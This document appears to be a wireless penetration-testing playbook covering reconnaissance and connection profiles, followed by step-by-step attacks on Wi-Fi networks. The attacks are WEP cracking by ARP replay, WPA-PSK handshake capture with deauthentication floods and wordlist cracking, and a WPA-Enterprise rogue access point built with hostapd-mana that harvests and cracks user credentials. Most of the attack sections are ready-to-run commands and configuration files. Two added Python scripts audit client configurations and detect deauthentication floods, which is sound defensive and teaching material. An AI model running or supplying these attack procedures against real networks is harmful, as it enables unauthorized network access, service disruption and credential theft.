By Zeyad Azima

Summary

Kudos to my friend @Abdulrahman for starting the first version of the playbook; after contributing together we updated it with an organized structure, more steps and more practicality. You can download the PDF version of the book from here.

Contact & Follow Us

Github Abdulrahman Zeyad
Linkedin Abdulrahman Zeyad
Twitter/X Abdulrahman Zeyad
Website Zeyad
Email 0xexploiteagle@gmail.com contact@zeyadazima.com

Follow The PlayBook Updates

Reconnaissance

Setup Interfaces

  • Set Interface to monitor mode
sudo airmon-ng check kill && sudo airmon-ng start <interface>
  • Set Interface to managed mode
sudo airmon-ng stop <interface>

Monitor Networks

  • Monitor networks
sudo airodump-ng --band abg --manufacturer <interface_in_monitor_mode>
  • Monitor networks, including WPS information
sudo airodump-ng --band abg --manufacturer --wps <interface_in_monitor_mode>
  • Monitor a specific network/BSSID
sudo airodump-ng --band abg --manufacturer --bssid <BSSID> -c <channel> <interface_in_monitor_mode>

Discover Hidden Networks

  • Get a hidden network's ESSID using its BSSID
sudo airodump-ng --band abg --bssid <BSSID> <interface_in_monitor_mode>
  • Get a hidden network's ESSID by brute force
mdk4 <interface_in_monitor_mode> p -t <BSSID> -f <wordlist>

Change Channel

  • The interface has to be in monitor mode:
sudo iwconfig <interface_in_monitor_mode> channel <number>

Change MAC Address

  1. Stop the network manager
    systemctl stop network-manager
  2. Bring the interface down
    ip link set <interface> down
  3. Change the MAC address
    macchanger -m <new_mac_address> <interface>
  4. Bring the interface up
    ip link set <interface> up

Tips

If this does not succeed, one of the following is the likely cause:

  1. The interface name is wrong
  2. The interface is still in monitor mode
    In the second case, fix it by setting the interface back to managed mode:
    sudo airmon-ng stop <interface>

Connecting to Networks

Connect to Open Network

open.conf

network={
ssid="Open_Network_Name"
key_mgmt=NONE
}

Set ssid to the name of the network you want to connect to, save the file as open.conf and connect with the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request an IP address from the DHCP server:

sudo dhclient wlan0 -v

Connect to WPA(1/2/3) Networks

WPA

network={
ssid="SSID"
psk="password"
scan_ssid=1
key_mgmt=WPA-PSK
proto=WPA2
}

Set proto to the network's WPA version:

  • WPA
  • WPA2
  • WPA3

Note: wpa_supplicant accepts proto=WPA and proto=WPA2 (alias RSN). WPA3-Personal is not selected through proto; it uses key_mgmt=SAE together with ieee80211w=2 (management frame protection, which WPA3 requires).

Set ssid to the name of the network you want to connect to, save the file as wpa.conf and connect with the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request an IP address from the DHCP server:

sudo dhclient wlan0 -v

Connect to WPA Enterprise

network={
ssid="SSID"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="identity\user"
password="password"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}

Set identity to the username and password to the password. Set ssid to the name of the network you want to connect to, save the file as wpa_entp.conf and connect with the following command:

sudo wpa_supplicant -i <int> -c <file>

Note: this profile has no ca_cert, so the client accepts whatever server certificate the RADIUS server presents; that is exactly the weakness the rogue access point in the Attacking WPA-Enterprise section relies on. On a client you want to protect, add ca_cert (and a domain_suffix_match for the RADIUS server's name) so that only the real server is trusted.

Then open another terminal and request an IP address from the DHCP server:

sudo dhclient wlan0 -v

Connect to WEP Network

network={
ssid="SSID"
key_mgmt=NONE
wep_key0=""
wep_tx_keyidx=0
}

Note: if the WEP key (wep_key0) is given in hex, write it without quotes; upper- and lowercase hex digits both work. An ASCII key is written inside double quotes.

Set ssid to the name of the network you want to connect to, save the file as wep.conf and connect with the following command:

sudo wpa_supplicant -i <int> -c <file>

Then open another terminal and request an IP address from the DHCP server:

sudo dhclient wlan0 -v
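The four wpa_supplicant profiles above are written to get connected, not to protect the client. As an added example (not part of the original playbook), the Python script below parses network={} blocks in that format and flags the settings a defender would reject on a managed client: open and WEP profiles, WPA version 1, short passphrases, and EAP profiles that do not pin the RADIUS server certificate (no ca_cert or server name match), the gap that the rogue access point in the Attacking WPA-Enterprise section exploits. The sample configuration, its SSIDs, the certificate path and the 12-character passphrase threshold are constructed for the example.

```python
import re

# Constructed sample configuration (not from the playbook's lab): the open,
# WPA, PEAP and WEP profiles as the playbook writes them, plus a hardened
# PEAP profile that pins the RADIUS CA and the server name.
SAMPLE_CONF = r"""
network={
ssid="Open_Network_Name"
key_mgmt=NONE
}

network={
ssid="Home"
psk="password"
scan_ssid=1
key_mgmt=WPA-PSK
proto=WPA
}

network={
ssid="Corp"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="corp\user"
password="password"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}

network={
ssid="Legacy"
key_mgmt=NONE
wep_key0=0123456789
wep_tx_keyidx=0
}

network={
ssid="Corp"
key_mgmt=WPA-EAP
eap=PEAP
identity="corp\user"
password="password"
ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
domain_suffix_match="radius.corp.example"
phase2="auth=MSCHAPV2"
}
"""

BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)
# Any one of these pins the server identity once ca_cert is set.
NAME_MATCH_KEYS = ("domain_suffix_match", "domain_match",
                   "altsubject_match", "subject_match")


def parse_networks(text):
    """Split a wpa_supplicant.conf into one dict per network={} block.

    Values lose their surrounding quotes; comments and blank lines are skipped.
    """
    nets = []
    for body in BLOCK_RE.findall(text):
        net = {}
        for raw in body.splitlines():
            line = raw.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, _, value = line.partition("=")
            net[key.strip()] = value.strip().strip('"')
        nets.append(net)
    return nets


def audit_network(net, min_psk_len=12):
    """Return (code, message) findings for one network block.

    min_psk_len is a local policy choice for this example, not a wpa_supplicant limit.
    """
    findings = []
    # wpa_supplicant's default when key_mgmt is absent is "WPA-PSK WPA-EAP".
    key_mgmt = net.get("key_mgmt", "WPA-PSK WPA-EAP").split()
    has_wep = any(k.startswith("wep_key") for k in net)

    if "NONE" in key_mgmt and has_wep:
        findings.append(("WEP", "WEP key is recoverable from captured traffic"))
    elif "NONE" in key_mgmt:
        findings.append(("OPEN", "no encryption; traffic is readable by anyone in range"))

    if net.get("proto") == "WPA":
        findings.append(("WPA1", "legacy WPA (version 1, TKIP); prefer WPA2/WPA3"))

    psk = net.get("psk")
    # A 64-hex-digit psk is a raw key, not a passphrase, so it is not length-checked.
    if psk is not None and not re.fullmatch(r"[0-9a-fA-F]{64}", psk) and len(psk) < min_psk_len:
        findings.append(("SHORT-PSK", f"passphrase shorter than {min_psk_len} chars; dictionary attack risk"))

    if "WPA-EAP" in key_mgmt and "eap" in net:
        if "ca_cert" not in net:
            findings.append(("EAP-NO-CA", "no ca_cert: any RADIUS server certificate is accepted, "
                                          "so a rogue AP can harvest the credentials"))
        elif not any(k in net for k in NAME_MATCH_KEYS):
            findings.append(("EAP-NO-NAME-MATCH", "ca_cert set but server name not matched; "
                                                  "any certificate from that CA is accepted"))
    return findings


def audit_conf(text):
    """Audit every block; returns [(ssid, [(code, message), ...]), ...]."""
    return [(net.get("ssid", "<no ssid>"), audit_network(net)) for net in parse_networks(text)]


if __name__ == "__main__":
    for ssid, findings in audit_conf(SAMPLE_CONF):
        status = "OK" if not findings else ", ".join(code for code, _ in findings)
        print(f"{ssid:20} {status}")
        for _, msg in findings:
            print(f"    - {msg}")
```

Run it against a real wpa_supplicant.conf by replacing SAMPLE_CONF with the file's contents; the hardened "Corp" profile at the end shows the two keys (ca_cert plus a name match) that turn the playbook's PEAP profile into one the rogue AP cannot impersonate.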

Attacking Networks

Attacking WEP Networks

  1. Capture packets from the target WEP network
sudo airodump-ng -w <pcap_file_name> --band abg --bssid <BSSID> -c <channel> <interface_in_monitor_mode>

  2. Send a fake authentication
sudo aireplay-ng -1 0 -a <BSSID> -h <interface_mac> -e "ESSID" <interface_in_monitor_mode>

Note: any MAC address can be given as the interface MAC, so a spoofed one works as well.

  3. ARP replay attack
sudo aireplay-ng --arpreplay -b <BSSID> -h <interface_mac> <interface_in_monitor_mode>

  4. Crack the key (airodump-ng names the capture <pcap_file_name>-01.cap)
sudo aircrack-ng <pcap_file_name>-01.cap

Attacking WPA-PSK Networks

  1. Gather information about the target network, such as its channel and BSSID
sudo airodump-ng --band abg <interface_in_monitor_mode>

A network listed as plain WPA with no version number is WPA (version 1).

  2. Capture the handshake
sudo airodump-ng <interface_in_monitor_mode> --bssid <BSSID> -c <channel> -w <pcap_file_name>

  3. Perform a deauthentication attack (kick a specific client off the network so that it reconnects and the handshake can be captured)
sudo aireplay-ng -0 5 -c <client_mac> -a <BSSID> <interface_in_monitor_mode>

Note: omit the -c option to send the deauthentication as broadcast (kicks all clients).
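The deauthentication step is what a wireless IDS should catch: aireplay-ng -0 sends a burst of deauthentication frames, aimed at one client or at the broadcast address, whereas an access point sends very few of them in normal operation. As an added example (not part of the original playbook), the Python script below groups deauth/disassoc frames by BSSID and raises one alert per burst of at least five frames spaced less than a second apart, marking whether the burst was broadcast. The frame records are constructed tuples (timestamp, subtype, BSSID, destination) with made-up MAC addresses; feeding it real frames from a monitor-mode capture is not shown.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
BEACON, DISASSOC, DEAUTH = 8, 10, 12  # 802.11 management frame subtypes

# Constructed MAC addresses for the sample (not real devices).
AP1, AP2, AP3 = "aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:02", "aa:bb:cc:dd:ee:03"
CLIENT1, CLIENT2 = "11:22:33:44:55:66", "11:22:33:44:55:77"

# Constructed frame records: (timestamp in seconds, subtype, BSSID, destination).
SAMPLE_FRAMES = (
    # AP1: a beacon and two isolated deauths six seconds apart (normal churn)
    [(0.0, BEACON, AP1, BROADCAST),
     (1.0, DEAUTH, AP1, CLIENT1),
     (7.0, DEAUTH, AP1, CLIENT2)]
    # AP2: ten deauths in half a second aimed at one client (targeted burst)
    + [(30.0 + i * 0.05, DEAUTH, AP2, CLIENT1) for i in range(10)]
    # AP3: six broadcast deauths in under a second (kicks every client)
    + [(60.0 + i * 0.1, DEAUTH, AP3, BROADCAST) for i in range(6)]
)


def detect_deauth_floods(frames, gap_s=1.0, threshold=5):
    """Return one alert per burst of deauth/disassoc frames from a BSSID.

    A burst is a run of frames from the same BSSID in which consecutive
    frames are at most gap_s seconds apart; it is reported when it holds
    at least threshold frames. Both limits are local tuning choices.
    """
    per_bssid = defaultdict(list)
    for ts, subtype, bssid, dst in frames:
        if subtype in (DEAUTH, DISASSOC):
            per_bssid[bssid].append((ts, dst))

    alerts = []
    for bssid, events in per_bssid.items():
        events.sort()
        burst = [events[0]]
        for event in events[1:]:
            if event[0] - burst[-1][0] <= gap_s:
                burst.append(event)
            else:
                _flush(bssid, burst, threshold, alerts)
                burst = [event]
        _flush(bssid, burst, threshold, alerts)
    alerts.sort(key=lambda a: a["start"])
    return alerts


def _flush(bssid, burst, threshold, alerts):
    """Append an alert for the burst if it is large enough to matter."""
    if len(burst) < threshold:
        return
    targets = {dst for _, dst in burst}
    alerts.append({
        "bssid": bssid,
        "start": burst[0][0],
        "end": burst[-1][0],
        "count": len(burst),
        "targets": targets,
        "broadcast": BROADCAST in targets,
    })


def format_alert(alert):
    """One-line summary suitable for a log or SIEM forwarder."""
    scope = ("ALL CLIENTS (broadcast)" if alert["broadcast"]
             else ", ".join(sorted(alert["targets"])))
    return (f"deauth flood from {alert['bssid']}: {alert['count']} frames in "
            f"{alert['end'] - alert['start']:.2f}s -> {scope}")


if __name__ == "__main__":
    for alert in detect_deauth_floods(SAMPLE_FRAMES):
        print(format_alert(alert))
```

The sample yields two alerts (AP2 targeted, AP3 broadcast) and none for AP1's two isolated deauths; the gap and threshold arguments are the two knobs to tune against a site's normal roaming behaviour before alerting on them.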

  4. Wait until the handshake is captured

  5. Once the EAPOL handshake is captured, crack the password with aircrack-ng
sudo aircrack-ng -w <wordlist> <pcap_file_name>-01.cap

Connect to the network as described in the Connecting to Networks section.

Attacking WPA-Enterprise

  1. First, gather information about the network, such as its BSSID and channel, so the capture can be filtered to it:
sudo airodump-ng --band abg <interface_in_monitor_mode>

  2. Then capture the handshake of the enterprise network:
sudo airodump-ng --band abg -c <channel> --bssid <BSSID> -w <pcap_file_name> <interface_in_monitor_mode>

  3. Look at the network's clients and deauthenticate one of them so that the PMKID of the network can be captured when it reconnects:
sudo aireplay-ng -0 4 -a <BSSID> -c <client_mac> <interface_in_monitor_mode>

Then wait until the handshake is captured; alternatively, simply wait for a client to connect on its own.

  4. Once the handshake is captured, go through the cap file and extract the identity (username)

  5. Extract the certificate

Note: save the certificate in DER format.

  6. Display the certificate information with the following command
openssl x509 -inform der -in CERTIFICATE_FILENAME -text

  7. Fake the network using FreeRADIUS
    Go to /etc/freeradius/3.0/certs and edit the following two files with the information obtained from the certificate:
nano ca.cnf

nano server.cnf

  8. Then, still under /etc/freeradius/3.0/certs, run the following commands to generate the Diffie-Hellman parameters used by hostapd-mana
rm dh
make

You may encounter an error at this point; it can be ignored.

  9. Create the EAP user file mana.eap_user:

*	PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]

  10. Create the fake access point by creating a file called network.conf in any other directory
  11. Paste the following configuration into the file and modify it to your needs:
ssid=<ESSID>
interface=<managed_mode_interface>
driver=nl80211

channel=<channel>
hw_mode=a
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0

eap_user_file=/etc/hostapd-mana/mana.eap_user

ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key

private_key_passwd=whatever

dh_file=/etc/freeradius/3.0/certs/dh


auth_algs=1
wpa=3
wpa_key_mgmt=WPA-EAP


wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/hostapd.credoutfile
mana_eapsuccess=1
mana_eaptls=1

  12. Set the interface back to managed mode

  13. Then start the fake AP with the following command

sudo hostapd-mana <file.conf>

  14. Perform a deauthentication attack (kick a specific client off the network to capture the handshake), using another interface:
sudo aireplay-ng -0 0 -c <client_mac> -a <BSSID> <interface_in_monitor_mode>

Note: omit the -c option to send the deauthentication as broadcast (kicks all clients).
A second interface in monitor mode is required, and it must be set to the same channel as the target network before running the deauthentication attack.

Tip: if there are two enterprise networks with the same name, perform the deauthentication attack on both.

  15. Once the handshake is captured, copy and paste the asleap command that is shown, adding -W /path/to/wordlist
asleap -C do:3b:8d:7b:22:00:0:91 -R 68:09:13:ac:e8:df:36:5f:42:94:fb:97:91:05:2:21:72:ff:b3:ce:c0:ca:26:f7 -W /usr/share/john/password.lst

Note: if that does not work, take the hash in hashcat format, put it in a file called hashfile and crack it with the following command
hashcat -a 0 -m 5500 hashfile rockyou.txt --force

  16. Once you have the username and password, go to the Connecting to Networks section to connect.

Install Required Tools & Packages:

FreeRADIUS

sudo apt update
sudo apt install freeradius freeradius-utils

Hostapd-Mana

sudo apt update
sudo apt install libssl-dev libnl-3-dev libnl-genl-3-dev
git clone https://github.com/sensepost/hostapd-mana.git
cd hostapd-mana/hostapd
make
sudo make install

Aircrack-ng

sudo apt update
sudo apt install aircrack-ng

Asleap

sudo apt update
sudo apt install asleap

Hashcat

sudo apt update
sudo apt install hashcat

John the Ripper

sudo apt update
sudo apt install john

Resources & Labs

Resources

Labs and Linux Dist

Labs 5.2.1

Note: this lab does not need any physical wireless card; everything runs inside the lab's virtual machine, which includes everything required. Shoutout to r4ulcl for this amazing lab.

Linux Dist